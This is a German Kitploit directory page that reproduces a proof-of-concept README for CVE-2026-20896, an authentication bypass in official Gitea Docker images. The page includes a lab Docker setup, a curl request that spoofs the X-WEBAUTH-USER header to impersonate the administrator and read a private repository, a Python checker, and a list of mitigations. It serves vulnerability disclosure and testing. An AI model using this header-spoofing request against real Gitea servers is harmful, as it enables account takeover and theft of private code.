Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-20896 — Gitea Docker-Image-Authentifizierungsumgehung | Kitploit
Tools/GitHubGitHub/eqstlab/cve-2026-20896
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebsicherheit
GitHubeqstlab/cve-2026-20896

CVE-2026-20896

Gitea Docker-Image-Authentifizierungsumgehung

Repository anzeigen
13vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-20896: Gitea Docker Image Authentication Bypass PoC

[!WARNING] Verwenden Sie dieses PoC nur in einem lokalen Labor oder gegen ein System, das Sie ausdrücklich testen dürfen.

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

Übersicht

CVE-2026-20896 ist ein Authentication Bypass in betroffenen offiziellen Gitea-Docker-Images. Wenn Reverse-Proxy-Authentifizierung aktiviert ist, ermöglicht die vom Image generierte Einstellung REVERSE_PROXY_TRUSTED_PROXIES = * einem Client, der das Gitea-Backend erreichen kann, sich über den X-WEBAUTH-USER-Header als bestehender Benutzer auszugeben.

Das Labor erstellt einen Administrator namens gitea-admin mit einem zufälligen Passwort und speichert CVE-2026-20896_AUTH_BYPASS_CONFIRMED im privaten Repository gitea-admin/private-proof. Das Lesen dieser Datei ohne Kenntnis des zufälligen Administrator-Passworts demonstriert den Bypass.

Betroffene Versionen

KategorieVersion
VerwundbarOffizielle gitea/gitea-Docker-Images ≤ 1.26.2
Erstmals gepatcht1.26.3
Empfohlen1.26.4 oder später

Die verwundbare Konfiguration erfordert, dass Reverse-Proxy-Authentifizierung aktiviert ist und das Gitea-Backend direkt erreichbar ist, oder dass ein vorgelagerter Proxy den vom Angreifer bereitgestellten Identitäts-Header beibehält. Für diese lokale Reproduktion ist kein Reverse-Proxy-Container erforderlich.

Umgebung

root@kitploit:~
# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

Warten Sie einige Sekunden, bis Gitea und das private Proof-Repository initialisiert sind.

PoC

cURL

root@kitploit:~
curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

Eine erfolgreiche Ausnutzung gibt CVE-2026-20896_AUTH_BYPASS_CONFIRMED zurück.

Python

root@kitploit:~
python poc.py http://127.0.0.1:3000

Das Skript vergleicht nicht authentifizierte, Nicht-Administrator- und gefälschte Administrator-Anfragen und gibt VULNERABLE aus, wenn der Autorisierungs-Bypass bestätigt wird. Es erfordert Python 3.10 oder später und verwendet nur die Standardbibliothek.

Auswirkungen

  • Identitätswechsel bekannter oder erratbarer Gitea-Benutzer
  • Unautorisierter Zugriff auf private Repositories und Benutzerressourcen
  • Administrative Aktionen, wenn ein Administratorkonto nachgeahmt wird

Gegenmaßnahmen

  • Upgrade auf Gitea 1.26.3 oder später; 1.26.4 oder später wird empfohlen.
  • Beschränken Sie REVERSE_PROXY_TRUSTED_PROXIES auf vertrauenswürdige Proxy-Adressen.
  • Verhindern Sie direkten Zugriff auf das Gitea-Backend und überschreiben Sie extern bereitgestellte Identitäts-Header.
  • Deaktivieren Sie Reverse-Proxy-Authentifizierung, wenn sie nicht erforderlich ist.

Bereinigung

root@kitploit:~
docker stop cve-2026-20896-gitea-vuln

Referenzen

  • Gitea Security Advisory GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 und 1.26.4 Release-Ankündigung
  • Gitea Security-Fix PR #38151
Tool herunterladen